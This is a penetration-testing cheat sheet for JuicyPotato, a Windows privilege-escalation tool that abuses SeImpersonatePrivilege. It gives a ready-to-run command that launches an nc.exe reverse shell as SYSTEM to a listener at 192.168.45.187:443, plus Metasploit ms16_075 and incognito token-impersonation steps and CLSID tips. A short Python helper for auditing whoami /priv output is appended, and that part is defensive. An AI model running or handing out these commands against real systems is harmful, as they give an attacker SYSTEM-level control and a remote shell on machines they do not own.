JuicyPotato
Description
Windows privilege escalation tool that abuses SeImpersonatePrivilege via token impersonation. JuicyPotato exploits COM servers to escalate from a service account to NT AUTHORITY\SYSTEM. It requires a valid CLSID for the target Windows version. Use JuicyPotato as a fallback when PrintSpoofer and EfsPotato fail.
Usage 1: Execute a Reverse Shell as SYSTEM
Use JuicyPotato to launch a command (such as an nc.exe reverse shell) as SYSTEM by specifying a listening port, a valid CLSID, the program to execute, and its arguments.
Command:
.\juicepotato.exe -l 1337 -c "{69AD4AEE-51BE-439b-A92C-86AE490E8B30}" -p c:\windows\system32\cmd.exe -a "/c c:\users\apache\desktop\nc.exe -e cmd.exe 192.168.45.187 443" -t *
Usage 2: Token Impersonation via Metasploit (Rotten Potato)
If you have a Meterpreter session and SeImpersonatePrivilege is enabled, use the Metasploit module for the Rotten Potato / token impersonation attack.
Command:
use windows/local/ms16_075_reflection
Then set required options and run. After getting a session, load incognito and impersonate a token:
Command:
load incognito
Command:
list_tokens -u
Command:
impersonate_token "PASTE_TOKEN_HERE"
Notes
- Requires SeImpersonatePrivilege to be enabled (check with whoami /priv).
- CLSID values differ per Windows version. Choose one from: https://ohpe.it/juicy-potato/CLSID/
- If a CLSID gives an error, try a different one.
- GitHub: https://github.com/ohpe/juicy-potato
- Reference for Rotten Potato: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
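The note above says to check for SeImpersonatePrivilege with whoami /priv. The following is an added defender-side helper, not part of the original page or the JuicyPotato project: it parses saved whoami /priv output (a constructed sample is embedded) and reports whether the token holds the privilege at all, because the State column only shows whether the privilege is currently enabled; a privilege that is present but Disabled can still be enabled by the process that holds it, so an audit should flag presence, not just the Enabled state. The watched-privilege set and the function names are this example's own.

```python
import re

# Constructed sample of `whoami /priv` output (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Privilege the page warns about; extend this set for your own audit policy.
WATCHED = {"SeImpersonatePrivilege"}

# One privilege row: name, free-text description, then Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} for every privilege row in the output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def impersonation_risk(text, watched=WATCHED):
    """Return [(name, state)] for watched privileges the token holds.

    Presence is what matters: a Disabled privilege is still held by the token
    and can be enabled by the process, so it is reported alongside Enabled.
    """
    privs = parse_whoami_priv(text)
    return sorted((p, privs[p]) for p in watched if p in privs)


if __name__ == "__main__":
    for name, state in impersonation_risk(SAMPLE_WHOAMI_PRIV):
        print(f"token holds {name} ({state}); review whether this account needs it")
```

Run it against the output of whoami /priv saved from a service account under review; an empty result means the account does not hold the watched privilege, which removes the precondition this page relies on.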